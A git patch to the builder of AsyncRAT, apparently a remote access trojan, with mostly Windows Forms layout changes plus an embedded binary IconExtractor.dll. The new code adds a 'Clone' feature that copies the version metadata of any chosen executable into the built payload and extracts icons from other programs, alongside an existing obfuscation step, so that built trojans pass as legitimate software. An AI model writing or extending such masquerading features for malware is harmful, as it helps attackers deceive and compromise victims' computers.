From f28103da83d88175d8cb4ffd75e8bf5dcb6dee42 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Tue, 8 Oct 2019 13:21:21 +0300 Subject: [PATCH] update added builder icon and assembly cloner --- .../Server/Forms/FormBuilder.Designer.cs | 120 ++++++++++-------- AsyncRAT-C#/Server/Forms/FormBuilder.cs | 57 ++++++++- .../Server/Resources/IconExtractor.dll | Bin 0 -> 10240 bytes AsyncRAT-C#/Server/Server.csproj | 3 + 4 files changed, 122 insertions(+), 58 deletions(-) create mode 100644 AsyncRAT-C#/Server/Resources/IconExtractor.dll diff --git a/AsyncRAT-C#/Server/Forms/FormBuilder.Designer.cs b/AsyncRAT-C#/Server/Forms/FormBuilder.Designer.cs index 380000c..0e546ec 100644 --- a/AsyncRAT-C#/Server/Forms/FormBuilder.Designer.cs +++ b/AsyncRAT-C#/Server/Forms/FormBuilder.Designer.cs @@ -85,11 +85,12 @@ namespace Server.Forms this.chkIcon = new System.Windows.Forms.CheckBox(); this.label15 = new System.Windows.Forms.Label(); this.txtIcon = new System.Windows.Forms.TextBox(); - this.btnIcon = new System.Windows.Forms.Button(); this.picIcon = new System.Windows.Forms.PictureBox(); this.tabPage6 = new System.Windows.Forms.TabPage(); this.chkObfu = new System.Windows.Forms.CheckBox(); this.btnBuild = new System.Windows.Forms.Button(); + this.btnClone = new System.Windows.Forms.Button(); + this.btnIcon = new System.Windows.Forms.Button(); this.groupBox1.SuspendLayout(); this.groupBox2.SuspendLayout(); this.groupBox3.SuspendLayout(); @@ -123,7 +124,7 @@ namespace Server.Forms this.groupBox1.Controls.Add(this.label2); this.groupBox1.Location = new System.Drawing.Point(6, 19); this.groupBox1.Name = "groupBox1"; - this.groupBox1.Size = new System.Drawing.Size(563, 417); + this.groupBox1.Size = new System.Drawing.Size(587, 437); this.groupBox1.TabIndex = 1; this.groupBox1.TabStop = false; this.groupBox1.Text = "Connection"; @@ -263,7 +264,7 @@ namespace Server.Forms this.groupBox2.Controls.Add(this.label4); this.groupBox2.Location = new System.Drawing.Point(6, 17); this.groupBox2.Name = "groupBox2"; - this.groupBox2.Size = new System.Drawing.Size(563, 417); + this.groupBox2.Size = new System.Drawing.Size(585, 439); this.groupBox2.TabIndex = 7; this.groupBox2.TabStop = false; this.groupBox2.Text = "Install"; @@ -329,7 +330,7 @@ namespace Server.Forms this.groupBox3.Controls.Add(this.chkAnti); this.groupBox3.Location = new System.Drawing.Point(6, 17); this.groupBox3.Name = "groupBox3"; - this.groupBox3.Size = new System.Drawing.Size(563, 417); + this.groupBox3.Size = new System.Drawing.Size(585, 439); this.groupBox3.TabIndex = 9; this.groupBox3.TabStop = false; this.groupBox3.Text = "MISC"; @@ -384,19 +385,17 @@ namespace Server.Forms // // tabControl1 // - this.tabControl1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) - | System.Windows.Forms.AnchorStyles.Left) - | System.Windows.Forms.AnchorStyles.Right))); this.tabControl1.Controls.Add(this.tabPage1); this.tabControl1.Controls.Add(this.tabPage2); this.tabControl1.Controls.Add(this.tabPage3); this.tabControl1.Controls.Add(this.tabPage4); this.tabControl1.Controls.Add(this.tabPage5); this.tabControl1.Controls.Add(this.tabPage6); - this.tabControl1.Location = new System.Drawing.Point(12, 12); + this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill; + this.tabControl1.Location = new System.Drawing.Point(0, 0); this.tabControl1.Name = "tabControl1"; this.tabControl1.SelectedIndex = 0; - this.tabControl1.Size = new System.Drawing.Size(583, 473); + this.tabControl1.Size = new System.Drawing.Size(607, 497); this.tabControl1.TabIndex = 10; // // tabPage1 @@ -405,7 +404,7 @@ namespace Server.Forms this.tabPage1.Location = new System.Drawing.Point(4, 29); this.tabPage1.Name = "tabPage1"; this.tabPage1.Padding = new System.Windows.Forms.Padding(3); - this.tabPage1.Size = new System.Drawing.Size(575, 440); + this.tabPage1.Size = new System.Drawing.Size(599, 464); this.tabPage1.TabIndex = 0; this.tabPage1.Text = "Connection"; this.tabPage1.UseVisualStyleBackColor = true; @@ -416,7 +415,7 @@ namespace Server.Forms this.tabPage2.Location = new System.Drawing.Point(4, 29); this.tabPage2.Name = "tabPage2"; this.tabPage2.Padding = new System.Windows.Forms.Padding(3); - this.tabPage2.Size = new System.Drawing.Size(575, 440); + this.tabPage2.Size = new System.Drawing.Size(599, 464); this.tabPage2.TabIndex = 1; this.tabPage2.Text = "Install"; this.tabPage2.UseVisualStyleBackColor = true; @@ -427,7 +426,7 @@ namespace Server.Forms this.tabPage3.Location = new System.Drawing.Point(4, 29); this.tabPage3.Name = "tabPage3"; this.tabPage3.Padding = new System.Windows.Forms.Padding(3); - this.tabPage3.Size = new System.Drawing.Size(575, 440); + this.tabPage3.Size = new System.Drawing.Size(599, 464); this.tabPage3.TabIndex = 2; this.tabPage3.Text = "Misc"; this.tabPage3.UseVisualStyleBackColor = true; @@ -438,13 +437,14 @@ namespace Server.Forms this.tabPage4.Location = new System.Drawing.Point(4, 29); this.tabPage4.Name = "tabPage4"; this.tabPage4.Padding = new System.Windows.Forms.Padding(3); - this.tabPage4.Size = new System.Drawing.Size(575, 440); + this.tabPage4.Size = new System.Drawing.Size(599, 464); this.tabPage4.TabIndex = 3; this.tabPage4.Text = "Assembly"; this.tabPage4.UseVisualStyleBackColor = true; // // groupBox4 // + this.groupBox4.Controls.Add(this.btnClone); this.groupBox4.Controls.Add(this.btnAssembly); this.groupBox4.Controls.Add(this.txtFileVersion); this.groupBox4.Controls.Add(this.txtProductVersion); @@ -464,7 +464,7 @@ namespace Server.Forms this.groupBox4.Controls.Add(this.label8); this.groupBox4.Location = new System.Drawing.Point(6, 17); this.groupBox4.Name = "groupBox4"; - this.groupBox4.Size = new System.Drawing.Size(563, 417); + this.groupBox4.Size = new System.Drawing.Size(585, 439); this.groupBox4.TabIndex = 8; this.groupBox4.TabStop = false; this.groupBox4.Text = "Assembly Information"; @@ -484,9 +484,9 @@ namespace Server.Forms // this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtFileVersion.Enabled = false; - this.txtFileVersion.Location = new System.Drawing.Point(159, 368); + this.txtFileVersion.Location = new System.Drawing.Point(159, 398); this.txtFileVersion.Name = "txtFileVersion"; - this.txtFileVersion.Size = new System.Drawing.Size(337, 26); + this.txtFileVersion.Size = new System.Drawing.Size(397, 26); this.txtFileVersion.TabIndex = 19; this.txtFileVersion.Text = global::Server.Properties.Settings.Default.txtFileVersion; // @@ -494,9 +494,9 @@ namespace Server.Forms // this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtProductVersion.Enabled = false; - this.txtProductVersion.Location = new System.Drawing.Point(159, 325); + this.txtProductVersion.Location = new System.Drawing.Point(159, 356); this.txtProductVersion.Name = "txtProductVersion"; - this.txtProductVersion.Size = new System.Drawing.Size(337, 26); + this.txtProductVersion.Size = new System.Drawing.Size(397, 26); this.txtProductVersion.TabIndex = 18; this.txtProductVersion.Text = global::Server.Properties.Settings.Default.txtProductVersion; // @@ -504,9 +504,9 @@ namespace Server.Forms // this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtOriginalFilename.Enabled = false; - this.txtOriginalFilename.Location = new System.Drawing.Point(159, 280); + this.txtOriginalFilename.Location = new System.Drawing.Point(159, 314); this.txtOriginalFilename.Name = "txtOriginalFilename"; - this.txtOriginalFilename.Size = new System.Drawing.Size(337, 26); + this.txtOriginalFilename.Size = new System.Drawing.Size(397, 26); this.txtOriginalFilename.TabIndex = 17; this.txtOriginalFilename.Text = global::Server.Properties.Settings.Default.txtOriginalFilename; // @@ -514,9 +514,9 @@ namespace Server.Forms // this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtTrademarks.Enabled = false; - this.txtTrademarks.Location = new System.Drawing.Point(159, 237); + this.txtTrademarks.Location = new System.Drawing.Point(159, 272); this.txtTrademarks.Name = "txtTrademarks"; - this.txtTrademarks.Size = new System.Drawing.Size(337, 26); + this.txtTrademarks.Size = new System.Drawing.Size(397, 26); this.txtTrademarks.TabIndex = 16; this.txtTrademarks.Text = global::Server.Properties.Settings.Default.txtTrademarks; // @@ -524,9 +524,9 @@ namespace Server.Forms // this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtCopyright.Enabled = false; - this.txtCopyright.Location = new System.Drawing.Point(159, 198); + this.txtCopyright.Location = new System.Drawing.Point(159, 230); this.txtCopyright.Name = "txtCopyright"; - this.txtCopyright.Size = new System.Drawing.Size(337, 26); + this.txtCopyright.Size = new System.Drawing.Size(397, 26); this.txtCopyright.TabIndex = 15; this.txtCopyright.Text = global::Server.Properties.Settings.Default.txtCopyright; // @@ -534,16 +534,16 @@ namespace Server.Forms // this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtCompany.Enabled = false; - this.txtCompany.Location = new System.Drawing.Point(159, 155); + this.txtCompany.Location = new System.Drawing.Point(159, 188); this.txtCompany.Name = "txtCompany"; - this.txtCompany.Size = new System.Drawing.Size(337, 26); + this.txtCompany.Size = new System.Drawing.Size(397, 26); this.txtCompany.TabIndex = 14; this.txtCompany.Text = global::Server.Properties.Settings.Default.txtCompany; // // label14 // this.label14.AutoSize = true; - this.label14.Location = new System.Drawing.Point(8, 331); + this.label14.Location = new System.Drawing.Point(8, 359); this.label14.Name = "label14"; this.label14.Size = new System.Drawing.Size(126, 20); this.label14.TabIndex = 13; @@ -552,7 +552,7 @@ namespace Server.Forms // label13 // this.label13.AutoSize = true; - this.label13.Location = new System.Drawing.Point(8, 371); + this.label13.Location = new System.Drawing.Point(8, 401); this.label13.Name = "label13"; this.label13.Size = new System.Drawing.Size(96, 20); this.label13.TabIndex = 12; @@ -561,7 +561,7 @@ namespace Server.Forms // label12 // this.label12.AutoSize = true; - this.label12.Location = new System.Drawing.Point(8, 283); + this.label12.Location = new System.Drawing.Point(8, 317); this.label12.Name = "label12"; this.label12.Size = new System.Drawing.Size(135, 20); this.label12.TabIndex = 11; @@ -570,7 +570,7 @@ namespace Server.Forms // label11 // this.label11.AutoSize = true; - this.label11.Location = new System.Drawing.Point(8, 240); + this.label11.Location = new System.Drawing.Point(8, 275); this.label11.Name = "label11"; this.label11.Size = new System.Drawing.Size(97, 20); this.label11.TabIndex = 10; @@ -579,7 +579,7 @@ namespace Server.Forms // label10 // this.label10.AutoSize = true; - this.label10.Location = new System.Drawing.Point(8, 200); + this.label10.Location = new System.Drawing.Point(8, 233); this.label10.Name = "label10"; this.label10.Size = new System.Drawing.Size(80, 20); this.label10.TabIndex = 9; @@ -588,7 +588,7 @@ namespace Server.Forms // label9 // this.label9.AutoSize = true; - this.label9.Location = new System.Drawing.Point(8, 158); + this.label9.Location = new System.Drawing.Point(8, 191); this.label9.Name = "label9"; this.label9.Size = new System.Drawing.Size(80, 20); this.label9.TabIndex = 8; @@ -598,16 +598,16 @@ namespace Server.Forms // this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtDescription.Enabled = false; - this.txtDescription.Location = new System.Drawing.Point(159, 112); + this.txtDescription.Location = new System.Drawing.Point(159, 146); this.txtDescription.Name = "txtDescription"; - this.txtDescription.Size = new System.Drawing.Size(337, 26); + this.txtDescription.Size = new System.Drawing.Size(397, 26); this.txtDescription.TabIndex = 7; this.txtDescription.Text = global::Server.Properties.Settings.Default.txtDescription; // // label7 // this.label7.AutoSize = true; - this.label7.Location = new System.Drawing.Point(8, 115); + this.label7.Location = new System.Drawing.Point(8, 149); this.label7.Name = "label7"; this.label7.Size = new System.Drawing.Size(93, 20); this.label7.TabIndex = 6; @@ -617,16 +617,16 @@ namespace Server.Forms // this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtProduct.Enabled = false; - this.txtProduct.Location = new System.Drawing.Point(159, 69); + this.txtProduct.Location = new System.Drawing.Point(159, 104); this.txtProduct.Name = "txtProduct"; - this.txtProduct.Size = new System.Drawing.Size(337, 26); + this.txtProduct.Size = new System.Drawing.Size(397, 26); this.txtProduct.TabIndex = 5; this.txtProduct.Text = global::Server.Properties.Settings.Default.ProductName; // // label8 // this.label8.AutoSize = true; - this.label8.Location = new System.Drawing.Point(8, 72); + this.label8.Location = new System.Drawing.Point(8, 107); this.label8.Name = "label8"; this.label8.Size = new System.Drawing.Size(68, 20); this.label8.TabIndex = 4; @@ -638,7 +638,7 @@ namespace Server.Forms this.tabPage5.Location = new System.Drawing.Point(4, 29); this.tabPage5.Name = "tabPage5"; this.tabPage5.Padding = new System.Windows.Forms.Padding(3); - this.tabPage5.Size = new System.Drawing.Size(575, 440); + this.tabPage5.Size = new System.Drawing.Size(599, 464); this.tabPage5.TabIndex = 4; this.tabPage5.Text = "Icon"; this.tabPage5.UseVisualStyleBackColor = true; @@ -652,7 +652,7 @@ namespace Server.Forms this.groupBox5.Controls.Add(this.picIcon); this.groupBox5.Location = new System.Drawing.Point(6, 17); this.groupBox5.Name = "groupBox5"; - this.groupBox5.Size = new System.Drawing.Size(563, 417); + this.groupBox5.Size = new System.Drawing.Size(585, 439); this.groupBox5.TabIndex = 0; this.groupBox5.TabStop = false; this.groupBox5.Text = "Add Icon"; @@ -682,20 +682,9 @@ namespace Server.Forms this.txtIcon.Enabled = false; this.txtIcon.Location = new System.Drawing.Point(15, 122); this.txtIcon.Name = "txtIcon"; - this.txtIcon.Size = new System.Drawing.Size(417, 26); + this.txtIcon.Size = new System.Drawing.Size(447, 26); this.txtIcon.TabIndex = 6; // - // btnIcon - // - this.btnIcon.Enabled = false; - this.btnIcon.Location = new System.Drawing.Point(456, 122); - this.btnIcon.Name = "btnIcon"; - this.btnIcon.Size = new System.Drawing.Size(60, 26); - this.btnIcon.TabIndex = 5; - this.btnIcon.Text = " "; - this.btnIcon.UseVisualStyleBackColor = true; - this.btnIcon.Click += new System.EventHandler(this.BtnIcon_Click); - // // picIcon // this.picIcon.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle; @@ -715,7 +704,7 @@ namespace Server.Forms this.tabPage6.Location = new System.Drawing.Point(4, 29); this.tabPage6.Name = "tabPage6"; this.tabPage6.Padding = new System.Windows.Forms.Padding(3); - this.tabPage6.Size = new System.Drawing.Size(575, 440); + this.tabPage6.Size = new System.Drawing.Size(599, 464); this.tabPage6.TabIndex = 5; this.tabPage6.Text = "Build"; this.tabPage6.UseVisualStyleBackColor = true; @@ -740,6 +729,28 @@ namespace Server.Forms this.btnBuild.UseVisualStyleBackColor = true; this.btnBuild.Click += new System.EventHandler(this.BtnBuild_Click); // + // btnClone + // + this.btnClone.Enabled = false; + this.btnClone.Location = new System.Drawing.Point(453, 43); + this.btnClone.Name = "btnClone"; + this.btnClone.Size = new System.Drawing.Size(103, 38); + this.btnClone.TabIndex = 21; + this.btnClone.Text = "Clone"; + this.btnClone.UseVisualStyleBackColor = true; + this.btnClone.Click += new System.EventHandler(this.BtnClone_Click); + // + // btnIcon + // + this.btnIcon.Enabled = false; + this.btnIcon.Location = new System.Drawing.Point(485, 122); + this.btnIcon.Name = "btnIcon"; + this.btnIcon.Size = new System.Drawing.Size(60, 26); + this.btnIcon.TabIndex = 5; + this.btnIcon.Text = " "; + this.btnIcon.UseVisualStyleBackColor = true; + this.btnIcon.Click += new System.EventHandler(this.BtnIcon_Click); + // // FormBuilder // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); @@ -829,12 +840,13 @@ namespace Server.Forms private System.Windows.Forms.GroupBox groupBox5; private System.Windows.Forms.Label label15; private System.Windows.Forms.TextBox txtIcon; - private System.Windows.Forms.Button btnIcon; private System.Windows.Forms.PictureBox picIcon; private System.Windows.Forms.CheckBox chkIcon; private System.Windows.Forms.CheckBox btnAssembly; private System.Windows.Forms.TabPage tabPage6; private System.Windows.Forms.Button btnBuild; private System.Windows.Forms.CheckBox chkObfu; + private System.Windows.Forms.Button btnClone; + private System.Windows.Forms.Button btnIcon; } } diff --git a/AsyncRAT-C#/Server/Forms/FormBuilder.cs b/AsyncRAT-C#/Server/Forms/FormBuilder.cs index 37cbdc5..9ce2fa5 100644 --- a/AsyncRAT-C#/Server/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/Server/Forms/FormBuilder.cs @@ -14,6 +14,7 @@ using dnlib.DotNet.Emit; using Server.RenamingObfuscation; using System.Threading.Tasks; using System.Diagnostics; +using Toolbelt.Drawing; namespace Server.Forms { @@ -203,7 +204,7 @@ namespace Server.Forms if (chkObfu.Checked) { //EncryptString.DoEncrypt(asmDef); - await Task.Run(() => + await Task.Run(() => { Renaming.DoRenaming(asmDef); }); @@ -268,6 +269,7 @@ namespace Server.Forms { if (btnAssembly.Checked) { + btnClone.Enabled = true; txtProduct.Enabled = true; txtDescription.Enabled = true; txtCompany.Enabled = true; @@ -280,6 +282,7 @@ namespace Server.Forms } else { + btnClone.Enabled = false; txtProduct.Enabled = false; txtDescription.Enabled = false; txtCompany.Enabled = false; @@ -311,16 +314,40 @@ namespace Server.Forms using (OpenFileDialog ofd = new OpenFileDialog()) { ofd.Title = "Choose Icon"; - ofd.Filter = "Icons *.ico|*.ico"; + ofd.Filter = "Icons Files(*.exe;*.ico;)|*.exe;*.ico"; ofd.Multiselect = false; if (ofd.ShowDialog() == DialogResult.OK) { - txtIcon.Text = ofd.FileName; - picIcon.ImageLocation = ofd.FileName; + if (ofd.FileName.ToLower().EndsWith(".exe")) + { + string ico = GetIcon(ofd.FileName); + txtIcon.Text = ico; + picIcon.ImageLocation = ico; + } + else + { + txtIcon.Text = ofd.FileName; + picIcon.ImageLocation = ofd.FileName; + } } } } + private string GetIcon(string path) + { + try + { + string tempFile = Path.GetTempFileName() + ".ico"; + using (FileStream fs = new FileStream(tempFile, FileMode.Create)) + { + IconExtractor.Extract1stIconTo(path, fs); + } + return tempFile; + } + catch { } + return ""; + } + private void WriteSettings(ModuleDefMD asmDef) { try @@ -442,5 +469,27 @@ namespace Server.Forms return sb.ToString(); } + private void BtnClone_Click(object sender, EventArgs e) + { + using (var openFileDialog = new OpenFileDialog()) + { + openFileDialog.Filter = "Executable (*.exe)|*.exe"; + if (openFileDialog.ShowDialog() == DialogResult.OK) + { + var fileVersionInfo = FileVersionInfo.GetVersionInfo(openFileDialog.FileName); + + txtOriginalFilename.Text = fileVersionInfo.InternalName ?? string.Empty; + txtDescription.Text = fileVersionInfo.FileDescription ?? string.Empty; + txtCompany.Text = fileVersionInfo.CompanyName ?? string.Empty; + txtProduct.Text = fileVersionInfo.ProductName ?? string.Empty; + txtCopyright.Text = fileVersionInfo.LegalCopyright ?? string.Empty; + txtTrademarks.Text = fileVersionInfo.LegalTrademarks ?? string.Empty; + + var version = fileVersionInfo.FileMajorPart; + txtFileVersion.Text = $"{fileVersionInfo.FileMajorPart.ToString()}.{fileVersionInfo.FileMinorPart.ToString()}.{fileVersionInfo.FileBuildPart.ToString()}.{fileVersionInfo.FilePrivatePart.ToString()}"; + txtProductVersion.Text = $"{fileVersionInfo.FileMajorPart.ToString()}.{fileVersionInfo.FileMinorPart.ToString()}.{fileVersionInfo.FileBuildPart.ToString()}.{fileVersionInfo.FilePrivatePart.ToString()}"; + } + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/Server/Resources/IconExtractor.dll b/AsyncRAT-C#/Server/Resources/IconExtractor.dll new file mode 100644 index 0000000000000000000000000000000000000000..d4fb497d4c9d0d750107ced8baf273c73c3adaa1 GIT binary patch literal 10240 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 literal 0 HcmV?d00001 diff --git a/AsyncRAT-C#/Server/Server.csproj b/AsyncRAT-C#/Server/Server.csproj index 2c25205..5a219f4 100644 --- a/AsyncRAT-C#/Server/Server.csproj +++ b/AsyncRAT-C#/Server/Server.csproj @@ -59,6 +59,9 @@ ..\packages\FCTB.2.16.24\lib\FastColoredTextBox.dll + + Resources\IconExtractor.dll +